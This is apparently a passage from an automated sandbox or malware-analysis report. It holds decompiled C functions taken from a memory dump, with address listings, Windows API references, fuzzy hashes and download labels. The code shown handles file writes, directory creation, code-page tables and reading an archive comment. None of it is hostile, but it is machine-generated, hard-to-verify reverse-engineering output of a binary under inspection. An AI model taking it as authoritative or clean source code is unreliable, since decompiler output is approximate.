    0x00839d97
    0x00839da8
    0x00839dae
    0x00839db7
    0x00839dbc
    0x00839dbc
    0x00000000
    0x00839d97
    0x00000000
    0x00000000
    0x00000000
    0x00839d11
    0x00839d11
    0x00839d13
    0x00839d1a
    0x00839d1c
    0x00839d1c
    0x00839d39
    0x00839d3e
    0x00839d40
    0x00839d43
    0x00000000
    0x00000000
    0x00839d45
    0x00839d4d
    0x00000000
    0x00000000
    0x00839d6f
    0x00839d71
    0x00000000
    0x00000000
    0x00000000
    0x00839d71
    0x00000000
    0x00839d51
    0x00839d60
    0x00839d69
    0x00839d6d
    0x00000000
    0x00839d6d
    0x00839cfe
    0x00000000

    APIs
    • GetStdHandle.KERNEL32(000000F5,?,?,0083C9A7,00000001,?,?,?,00000000,00844B67,?,?,?,?,?,0084460C), ref: 00839CF3
    • WriteFile.KERNEL32(?,00000000,?,00844814,00000000,?,?,00000000,00844B67,?,?,?,?,?,0084460C,?), ref: 00839D33
    • WriteFile.KERNELBASE(?,00000000,?,00844814,00000000,?,00000001,?,?,0083C9A7,00000001,?,?,?,00000000,00844B67), ref: 00839D60
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FileWrite$Handle
    • String ID:
    • API String ID: 4209713984-0
    • Opcode ID: 21c206721206dbd9590b0a531d93b1c44900426fbb8b383394bbe2f549ece91c
    • Instruction ID: ff90c96cace81fd802c74b1e7159881d5ad830d7560977ba7c8c63d322381215
    • Opcode Fuzzy Hash: 21c206721206dbd9590b0a531d93b1c44900426fbb8b383394bbe2f549ece91c
    • Instruction Fuzzy Hash: FA310571208609BFDB249E14D849B66B7A8FF90310F048119F5D6D35D0C7F4E849CBE2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00839F96(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
    				short _v4100;
    				signed int _t8;
    				long _t10;
    				void* _t11;
    				int _t18;
    				WCHAR* _t21;
    
    				E0084D9C0();
    				_t21 = _a4;
    				_t8 =  *(E0083B9C4(__eflags, _t21)) & 0x0000ffff;
    				if(_t8 == 0x2e || _t8 == 0x20) {
    					L3:
    					if(E00839F0F(_t21) != 0 || E0083B3C9(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
    						_t10 = GetLastError();
    						__eflags = _t10 - 2;
    						if(_t10 == 2) {
    							L12:
    							_t11 = 2;
    						} else {
    							__eflags = _t10 - 3;
    							if(_t10 == 3) {
    								goto L12;
    							} else {
    								_t11 = 1;
    							}
    						}
    					} else {
    						goto L6;
    					}
    				} else {
    					_t18 = CreateDirectoryW(_t21, 0); // executed
    					if(_t18 != 0) {
    						L6:
    						if(_a8 != 0) {
    							E0083A1D3(_t21, _a12);
    						}
    						_t11 = 0;
    					} else {
    						goto L3;
    					}
    				}
    				return _t11;
    			}









    0x00839f9e
    0x00839fa4
    0x00839fad
    0x00839fb3
    0x00839fc7
    0x00839fcf
    0x0083a00d
    0x0083a013
    0x0083a016
    0x0083a022
    0x0083a024
    0x0083a018
    0x0083a018
    0x0083a01b
    0x00000000
    0x0083a01d
    0x0083a01f
    0x0083a01f
    0x0083a01b
    0x00000000
    0x00000000
    0x00000000
    0x00839fba
    0x00839fbd
    0x00839fc5
    0x00839ffa
    0x00839ffe
    0x0083a004
    0x0083a004
    0x0083a009
    0x00000000
    0x00000000
    0x00000000
    0x00839fc5
    0x0083a029

    APIs
    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 00839FBD
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 00839FF0
    • GetLastError.KERNEL32(?,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 0083A00D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CreateDirectory$ErrorLast
    • String ID:
    • API String ID: 2485089472-0
    • Opcode ID: 0ea3af93e22371291ea75568810b676874e359592c09eda2609dd88ae19df885
    • Instruction ID: a236a98242e7cd1a3072d63b9cc2f93312f7dd28ad5a9534d6f7bb07b5f47ba0
    • Opcode Fuzzy Hash: 0ea3af93e22371291ea75568810b676874e359592c09eda2609dd88ae19df885
    • Instruction Fuzzy Hash: CD019E71100A58E6EB39EBA88C49BFA378CFF8A741F044451F9C2D5080DBA49981C6E7
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00833AAF(void* __ecx, signed int __edx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				char _t76;
    				signed int _t83;
    				intOrPtr _t94;
    				void* _t120;
    				char _t121;
    				void* _t130;
    				signed int _t144;
    				signed int _t148;
    				void* _t151;
    				void* _t153;
    
    				_t143 = __edx;
    				E0084D8C4(E00861242, __ecx);
    				E0084D9C0();
    				_t151 = __ecx;
    				_t156 =  *((char*)(__ecx + 0x6cc4));
    				if( *((char*)(__ecx + 0x6cc4)) == 0) {
    					__eflags =  *((char*)(__ecx + 0x45f0)) - 5;
    					if(__eflags > 0) {
    						L26:
    						E00836D22(__eflags, 0x1e, _t151 + 0x1e);
    						goto L27;
    					}
    					__eflags =  *((intOrPtr*)(__ecx + 0x6cb0)) - 3;
    					__eflags =  *((intOrPtr*)(__ecx + 0x45ec)) - ((0 |  *((intOrPtr*)(__ecx + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
    					if(__eflags > 0) {
    						goto L26;
    					}
    					_t83 =  *(__ecx + 0x5628) |  *(__ecx + 0x562c);
    					__eflags = _t83;
    					if(_t83 != 0) {
    						L7:
    						_t120 = _t151 + 0x20e8;
    						E0083C666(_t83, _t120);
    						_push(_t120);
    						E00841506(_t153 - 0xe6ec, __eflags);
    						_t121 = 0;
    						 *((intOrPtr*)(_t153 - 4)) = 0;
    						E008428B5(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
    						_t148 =  *(_t153 + 8);
    						__eflags =  *(_t153 + 0xc);
    						if( *(_t153 + 0xc) != 0) {
    							L15:
    							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
    							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
    								L18:
    								E0083A7CC(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
    								 *((intOrPtr*)(_t151 + 0x2108)) =  *((intOrPtr*)(_t151 + 0x5628));
    								 *((intOrPtr*)(_t151 + 0x210c)) =  *((intOrPtr*)(_t151 + 0x562c));
    								 *((char*)(_t151 + 0x2110)) = _t121;
    								E0083C719(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
    								_t130 = _t151 + 0x20e8;
    								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
    								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
    								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
    								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
    								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
    								_t144 =  *(_t151 + 0x5634);
    								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
    								 *(_t153 - 0x9aa0) = _t144;
    								 *((char*)(_t153 - 0x9a8c)) = _t121;
    								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
    								if(__eflags != 0) {
    									E0084254C(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
    								} else {
    									_push(_t144);
    									_push(_t94);
    									_push(_t130); // executed
    									E008391A3(_t121, _t130, _t144, _t148, __eflags); // executed
    								}
    								asm("sbb edx, edx");
    								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
    								__eflags = E0083A79A(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
    								if(__eflags != 0) {
    									_t121 = 1;
    								} else {
    									E00831F29(__eflags, 0x1f, _t151 + 0x1e, _t151 + 0x45f8);
    									E00836F18(0x8700e0, 3);
    									__eflags = _t148;
    									if(_t148 != 0) {
    										E00835E40(_t148);
    									}
    								}
    								L25:
    								E0084173E(_t153 - 0xe6ec, _t143, _t148, _t151);
    								_t76 = _t121;
    								goto L28;
    							}
    							_t143 =  *(_t151 + 0x21bc);
    							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
    							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
    								goto L25;
    							}
    							asm("sbb ecx, ecx");
    							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
    							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
    							E0083C6D1(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
    							goto L18;
    						}
    						__eflags =  *(_t151 + 0x5634);
    						if(__eflags < 0) {
    							L12:
    							__eflags = _t148;
    							if(_t148 != 0) {
    								E00831FC9(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
    								E0083C736(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
    							} else {
    								 *((char*)(_t151 + 0x2111)) = 1;
    							}
    							goto L15;
    						}
    						if(__eflags > 0) {
    							L11:
    							E00836D22(__eflags, 0x1e, _t151 + 0x1e);
    							goto L25;
    						}
    						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
    						if(__eflags <= 0) {
    							goto L12;
    						}
    						goto L11;
    					}
    					__eflags =  *((intOrPtr*)(__ecx + 0x5669)) - _t83;
    					if( *((intOrPtr*)(__ecx + 0x5669)) != _t83) {
    						goto L7;
    					} else {
    						_t76 = 1;
    						goto L28;
    					}
    				} else {
    					E00836D22(_t156, 0x1d, __ecx + 0x1e);
    					E00836F18(0x8700e0, 3);
    					L27:
    					_t76 = 0;
    					L28:
    					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
    					return _t76;
    				}
    			}
















    0x00833aaf
    0x00833ab4
    0x00833abe
    0x00833ac4
    0x00833ac6
    0x00833acd
    0x00833aeb
    0x00833af2
    0x00833d34
    0x00833d3a
    0x00000000
    0x00833d3a
    0x00833afa
    0x00833b0b
    0x00833b11
    0x00000000
    0x00000000
    0x00833b1d
    0x00833b1d
    0x00833b23
    0x00833b34
    0x00833b35
    0x00833b3e
    0x00833b43
    0x00833b4a
    0x00833b4f
    0x00833b5e
    0x00833b61
    0x00833b66
    0x00833b69
    0x00833b6c
    0x00833bc1
    0x00833bc1
    0x00833bc7
    0x00833c23
    0x00833c31
    0x00833c45
    0x00833c52
    0x00833c58
    0x00833c5e
    0x00833c66
    0x00833c6c
    0x00833c78
    0x00833c84
    0x00833c87
    0x00833c8a
    0x00833c90
    0x00833c96
    0x00833c9c
    0x00833ca2
    0x00833ca8
    0x00833cae
    0x00833cc7
    0x00833cb0
    0x00833cb0
    0x00833cb1
    0x00833cb2
    0x00833cb3
    0x00833cb3
    0x00833ce1
    0x00833ce3
    0x00833cf2
    0x00833cf4
    0x00833d21
    0x00833cf6
    0x00833d03
    0x00833d0f
    0x00833d14
    0x00833d16
    0x00833d1a
    0x00833d1a
    0x00833d16
    0x00833d23
    0x00833d29
    0x00833d2f
    0x00000000
    0x00833d31
    0x00833bc9
    0x00833bcf
    0x00833bd5
    0x00000000
    0x00000000
    0x00833bfe
    0x00833c07
    0x00833c07
    0x00833c1e
    0x00000000
    0x00833c1e
    0x00833b6e
    0x00833b74
    0x00833b94
    0x00833b94
    0x00833b96
    0x00833ba9
    0x00833bbc
    0x00833b98
    0x00833b98
    0x00833b98
    0x00000000
    0x00833b96
    0x00833b76
    0x00833b84
    0x00833b8a
    0x00000000
    0x00833b8a
    0x00833b78
    0x00833b82
    0x00000000
    0x00000000
    0x00000000
    0x00833b82
    0x00833b25
    0x00833b2b
    0x00000000
    0x00833b2d
    0x00833b2d
    0x00000000
    0x00833b2d
    0x00833acf
    0x00833ad5
    0x00833ae1
    0x00833d3f
    0x00833d3f
    0x00833d41
    0x00833d45
    0x00833d4f
    0x00833d4f

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID: CMT
    • API String ID: 3519838083-2756464174
    • Opcode ID: 7e1d42a28cafaf340a87dc0fc162250c3e64ae29ddfe92e4ca553f0ef2c66b23
    • Instruction ID: bc699040e206596e29170d570a5f01e297756aa44a13a2510714997cd3d78820
    • Opcode Fuzzy Hash: 7e1d42a28cafaf340a87dc0fc162250c3e64ae29ddfe92e4ca553f0ef2c66b23
    • Instruction Fuzzy Hash: 1771BF71504F48AADB21DB78CC45AE7B7E8FB94301F44492EE1ABD7142DA326A48CF91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0085A579(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
    				signed int _v8;
    				char _v264;
    				char _v520;
    				char _v776;
    				char _v1800;
    				char _v1814;
    				struct _cpinfo _v1820;
    				intOrPtr _v1824;
    				signed int _v1828;
    				signed int _t63;
    				void* _t67;
    				signed int _t68;
    				intOrPtr _t69;
    				void* _t72;
    				char _t73;
    				char _t74;
    				signed char _t75;
    				signed int _t76;
    				signed char _t86;
    				char _t87;
    				char _t90;
    				signed int _t93;
    				signed int _t94;
    				signed int _t95;
    				void* _t96;
    				char* _t97;
    				intOrPtr _t101;
    				signed int _t102;
    
    				_t95 = __edx;
    				_t63 =  *0x86d668; // 0x14325215
    				_v8 = _t63 ^ _t102;
    				_t101 = _a4;
    				_t4 = _t101 + 4; // 0x5efc4d8b
    				if(GetCPInfo( *_t4,  &_v1820) == 0) {
    					_t47 = _t101 + 0x119; // 0x85abc4
    					_t96 = _t47;
    					_t90 = 0;
    					_t67 = 0xffffff9f;
    					_t68 = _t67 - _t96;
    					__eflags = _t68;
    					_v1828 = _t68;
    					do {
    						_t97 = _t96 + _t90;
    						_t69 = _t68 + _t97;
    						_v1824 = _t69;
    						__eflags = _t69 + 0x20 - 0x19;
    						if(_t69 + 0x20 > 0x19) {
    							__eflags = _v1824 - 0x19;
    							if(_v1824 > 0x19) {
    								 *_t97 = 0;
    							} else {
    								_t72 = _t101 + _t90;
    								_t57 = _t72 + 0x19;
    								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
    								__eflags =  *_t57;
    								_t59 = _t90 - 0x20; // -32
    								_t73 = _t59;
    								goto L24;
    							}
    						} else {
    							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
    							_t54 = _t90 + 0x20; // 0x20
    							_t73 = _t54;
    							L24:
    							 *_t97 = _t73;
    						}
    						_t68 = _v1828;
    						_t61 = _t101 + 0x119; // 0x85abc4
    						_t96 = _t61;
    						_t90 = _t90 + 1;
    						__eflags = _t90 - 0x100;
    					} while (_t90 < 0x100);
    				} else {
    					_t74 = 0;
    					do {
    						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
    						_t74 = _t74 + 1;
    					} while (_t74 < 0x100);
    					_t75 = _v1814;
    					_t93 =  &_v1814;
    					_v264 = 0x20;
    					while(1) {
    						_t108 = _t75;
    						if(_t75 == 0) {
    							break;
    						}
    						_t95 =  *(_t93 + 1) & 0x000000ff;
    						_t76 = _t75 & 0x000000ff;
    						while(1) {
    							__eflags = _t76 - _t95;
    							if(_t76 > _t95) {
    								break;
    							}
    							__eflags = _t76 - 0x100;
    							if(_t76 < 0x100) {
    								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
    								_t76 = _t76 + 1;
    								__eflags = _t76;
    								continue;
    							}
    							break;
    						}
    						_t93 = _t93 + 2;
    						__eflags = _t93;
    						_t75 =  *_t93;
    					}
    					_t13 = _t101 + 4; // 0x5efc4d8b
    					E0085B645(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
    					_t16 = _t101 + 4; // 0x5efc4d8b
    					_t19 = _t101 + 0x21c; // 0x2ebf88b
    					E0085981D(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
    					_t21 = _t101 + 4; // 0x5efc4d8b
    					_t23 = _t101 + 0x21c; // 0x2ebf88b
    					E0085981D(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
    					_t94 = 0;
    					do {
    						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
    						if((_t86 & 0x00000001) == 0) {
    							__eflags = _t86 & 0x00000002;
    							if((_t86 & 0x00000002) == 0) {
    								 *((char*)(_t101 + _t94 + 0x119)) = 0;
    							} else {
    								_t37 = _t101 + _t94 + 0x19;
    								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
    								__eflags =  *_t37;
    								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
    								goto L15;
    							}
    						} else {
    							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
    							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
    							L15:
    							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
    						}
    						_t94 = _t94 + 1;
    					} while (_t94 < 0x100);
    				}
    				return E0084E243(_v8 ^ _t102);
    			}































    0x0085a579
    0x0085a584
    0x0085a58b
    0x0085a590
    0x0085a59b
    0x0085a5ad
    0x0085a6a5
    0x0085a6a5
    0x0085a6ab
    0x0085a6ad
    0x0085a6ae
    0x0085a6ae
    0x0085a6b0
    0x0085a6b6
    0x0085a6b6
    0x0085a6b8
    0x0085a6ba
    0x0085a6c3
    0x0085a6c6
    0x0085a6d2
    0x0085a6d9
    0x0085a6e9
    0x0085a6db
    0x0085a6db
    0x0085a6de
    0x0085a6de
    0x0085a6de
    0x0085a6e2
    0x0085a6e2
    0x00000000
    0x0085a6e2
    0x0085a6c8
    0x0085a6c8
    0x0085a6cd
    0x0085a6cd
    0x0085a6e5
    0x0085a6e5
    0x0085a6e5
    0x0085a6eb
    0x0085a6f1
    0x0085a6f1
    0x0085a6f7
    0x0085a6f8
    0x0085a6f8
    0x0085a5b3
    0x0085a5b3
    0x0085a5b5
    0x0085a5b5
    0x0085a5bc
    0x0085a5bd
    0x0085a5c1
    0x0085a5c7
    0x0085a5cd
    0x0085a5f5
    0x0085a5f5
    0x0085a5f7
    0x00000000
    0x00000000
    0x0085a5d6
    0x0085a5da
    0x0085a5ec
    0x0085a5ec
    0x0085a5ee
    0x00000000
    0x00000000
    0x0085a5df
    0x0085a5e1
    0x0085a5e3
    0x0085a5eb
    0x0085a5eb
    0x00000000
    0x0085a5eb
    0x00000000
    0x0085a5e1
    0x0085a5f0
    0x0085a5f0
    0x0085a5f3
    0x0085a5f3
    0x0085a5fa
    0x0085a60f
    0x0085a615
    0x0085a629
    0x0085a630
    0x0085a63f
    0x0085a651
    0x0085a658
    0x0085a660
    0x0085a662
    0x0085a662
    0x0085a66c
    0x0085a67c
    0x0085a67e
    0x0085a695
    0x0085a680
    0x0085a680
    0x0085a680
    0x0085a680
    0x0085a685
    0x00000000
    0x0085a685
    0x0085a66e
    0x0085a66e
    0x0085a673
    0x0085a68c
    0x0085a68c
    0x0085a68c
    0x0085a69c
    0x0085a69d
    0x0085a6a1
    0x0085a70c

    APIs
    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0085A59E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Info
    • String ID:
    • API String ID: 1807457897-3916222277
    • Opcode ID: c60f5a22ead1d0d0cc3d8f8b0636a4b0f8a539d1317d661d2022616f4bb8f79e
    • Instruction ID: d55ec14f2b68d0e6cfb27b9be4ba17eb78d94a1d1c168ab30dd6ca6ed6ec77e6
    • Opcode Fuzzy Hash: c60f5a22ead1d0d0cc3d8f8b0636a4b0f8a539d1317d661d2022616f4bb8f79e
    • Instruction Fuzzy Hash: 2F414AB050424C9EDF258E688CC4BF6BBE9FB55309F1805ECE98AC7142E235DA49DF61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00831DB1(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
    				void* _t34;
    				intOrPtr _t41;
    				unsigned int _t64;
    				signed int _t66;
    				intOrPtr* _t68;
    				void* _t70;
    
    				E0084D8C4(E008611EF, __ecx);
    				_t49 = 0;
    				 *((intOrPtr*)(_t70 - 0x10)) = __ecx;
    				 *((intOrPtr*)(_t70 - 0x24)) = 0;
    				 *(_t70 - 0x20) = 0;
    				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
    				 *((intOrPtr*)(_t70 - 0x18)) = 0;
    				 *((char*)(_t70 - 0x14)) = 0;
    				 *((intOrPtr*)(_t70 - 4)) = 0;
    				_t34 = E00833AAF(__ecx, __edx, _t70 - 0x24, 0, 0); // executed
    				if(_t34 != 0) {
    					_t64 =  *(_t70 - 0x20);
    					E00831715(_t70 - 0x24, __edx, 1);
    					_t68 =  *((intOrPtr*)(_t70 + 8));
    					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
    					E0083188C(_t68, _t64 + 1);
    					_t41 =  *((intOrPtr*)(_t70 - 0x10));
    					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
    						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
    							E00841006( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
    						} else {
    							_t66 = _t64 >> 1;
    							E00841081( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
    							 *((short*)( *_t68 + _t66 * 2)) = 0;
    						}
    					} else {
    						_push( *((intOrPtr*)(_t68 + 4)));
    						_push( *_t68);
    						_push( *((intOrPtr*)(_t70 - 0x24)));
    						E008410BC();
    					}
    					E0083188C(_t68, E00852B93( *_t68));
    					_t49 = 1;
    				}
    				E0083158D(_t70 - 0x24);
    				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
    				return _t49;
    			}









    0x00831db6
    0x00831dbf
    0x00831dc3
    0x00831dc6
    0x00831dc9
    0x00831dcc
    0x00831dcf
    0x00831dd2
    0x00831dda
    0x00831de0
    0x00831de7
    0x00831def
    0x00831df7
    0x00831e02
    0x00831e05
    0x00831e0f
    0x00831e14
    0x00831e1e
    0x00831e36
    0x00831e57
    0x00831e38
    0x00831e38
    0x00831e40
    0x00831e49
    0x00831e49
    0x00831e20
    0x00831e20
    0x00831e23
    0x00831e25
    0x00831e28
    0x00831e28
    0x00831e67
    0x00831e6d
    0x00831e6f
    0x00831e73
    0x00831e7e
    0x00831e88

    APIs
    • __EH_prolog.LIBCMT ref: 00831DB6
      • Part of subcall function 00833AAF: __EH_prolog.LIBCMT ref: 00833AB4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID: CMT
    • API String ID: 3519838083-2756464174
    • Opcode ID: 23c8319813d4fa350e7c80181c7fd44108ccfec54eaf84ff672bc1913daba075
    • Instruction ID: dd0719115d593a666cf02dd16e6d0465b15f413fbb624999b0edc86900c9e674
    • Opcode Fuzzy Hash: 23c8319813d4fa350e7c80181c7fd44108ccfec54eaf84ff672bc1913daba075
    • Instruction Fuzzy Hash: 352157769002089ECF15EF98D9499EEFBF6FF88700F10006AE845E7252CB325E40CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E0083190B(intOrPtr* __ecx, intOrPtr __edx, void* __esi) {
    				void* __edi;
    				void* _t19;
    				void* _t23;
    				void* _t25;
    				signed int _t27;
    				void* _t28;
    				signed int _t35;
    				intOrPtr _t45;
    				void* _t52;
    				void* _t53;
    
    				_t45 = __edx;
    				E0084D8C4(_t19, __ecx);
    				if( *((char*)(__ecx + 0x6cb6)) != 0) {
    					 *((intOrPtr*)(_t53 - 0x1c)) = __ecx;
    					 *((intOrPtr*)(_t53 - 0x14)) =  *((intOrPtr*)( *__ecx + 0x14))();
    					 *((intOrPtr*)(_t53 - 0x10)) = __edx;
    					_t35 = 0;
    					 *((intOrPtr*)(_t53 - 4)) = 0;
    					if( *((intOrPtr*)(__ecx + 0x2224)) == 0) {
    						_push(__esi);
    						_push(0);
    						_t23 = E008320B5(__ecx);
    						_push(_t45);
    						 *((intOrPtr*)( *__ecx + 0x10))();
    						_t25 = E00833E61(__ecx, _t45, L"CMT");
    						_t52 = _t23;
    						if(_t25 != 0) {
    							_t28 = E00831DB1(__ecx, _t45, __ecx, _t52,  *((intOrPtr*)(_t53 + 8))); // executed
    							if(_t28 != 0) {
    								_t35 = 1;
    							}
    						}
    					} else {
    						_push(0);
    						_push(0);
    						_push( *((intOrPtr*)(__ecx + 0x6cc0)) + 0x14);
    						 *((intOrPtr*)( *__ecx + 0x10))();
    						if(E00833A2C(__ecx,  *__ecx) != 0 &&  *((intOrPtr*)(__ecx + 0x21dc)) == 0x75) {
    							_t35 = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t53 + 8)) + 4)) > 0x00000000;
    						}
    					}
    					E0083168F(_t53 - 0x1c); // executed
    					_t27 = _t35;
    				} else {
    					_t27 = 0;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
    				return _t27;
    			}













    0x0083190b
    0x0083190b
    0x0083191d
    0x00831929
    0x0083192f
    0x00831932
    0x00831935
    0x00831939
    0x00831942
    0x00831974
    0x00831977
    0x00831978
    0x0083197d
    0x00831981
    0x0083198b
    0x00831990
    0x00831993
    0x0083199a
    0x008319a1
    0x008319a3
    0x008319a3
    0x008319a1
    0x00831944
    0x0083194f
    0x00831950
    0x00831951
    0x00831952
    0x0083195e
    0x0083196f
    0x0083196f
    0x0083195e
    0x008319a8
    0x008319ad
    0x0083191f
    0x0083191f
    0x0083191f
    0x008319b4
    0x008319be

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
